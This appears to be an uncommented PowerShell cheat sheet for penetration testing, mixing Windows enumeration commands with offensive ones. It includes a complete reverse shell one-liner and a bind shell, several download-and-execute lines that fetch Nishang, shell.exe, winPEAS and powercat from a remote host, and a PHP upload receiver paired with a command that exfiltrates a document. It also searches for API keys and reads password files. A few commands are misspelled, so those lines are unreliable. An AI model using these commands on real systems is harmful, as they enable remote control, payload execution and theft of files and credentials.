PowerShell

powershell -ep bypass

nc -nvlp 4444

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('11.22.33.44',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

sudo git clone https://github.com/samratashok/nishang /opt/nishang

powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444

powershell -c "$l = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$l.start();$client = $l.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$l.Stop()"

nc -nv 11.22.33.44 4444

Start-Process notepad.txt

Get-command get-*ip*

Get-Childitem -Path C:\

gci -force

Get-Childitem -Path C:\ -Recurse -force -Include *.txt
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Include *interesting-file.txt*
Get-Childitem -Path C:\ -Recurse -force -ErrorAction SilentlyContinue -Filter *interesting-file.txt*

Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue

more password.txt
type password.txt
cat password.txt
get-content .\password.txt

get-process | out-gridview
get-hostfix | out-gridview

get-hotfix | out-file hotfix.txt

copy-item password.txt password_copy.txt
move-item password.txt password_copy.txt

(New-Object System.Net.WebClient).DownloadFile("http://<IP>/shell.exe","C:/windows/temp/shell.exe")

IEX (New-Object System.Net.WebClient).DownloadString('http://<IP>/hello.ps1')

<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

(New-Object System.Net.WebClient).UploadFile('http://<ip>/upload.php', 'important.docx')

Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY

get-service
get-service | where-object -property status -eq running
get-service | where-object -property status -eq stopped
Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

get-location

test-path c:/program files/interesting-files.txt

get-localuser

get-localuser | select *

get-localuser -name Administrator | select *

get-localgroup

get-netipadresss

get-process

get-scheduledtask

get-acl c:

Expand-Archive -Path winpeas.zip -DestinationPath .

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP"

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/winpeas.bat','C:\Windows\Temp\winpeas.bat')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://11.22.33.44:8000/powercat.ps1','C:\Windows\Temp\powercat.ps1')"

get-hotfix
get-hotfix | format-list | findstr InstalledOn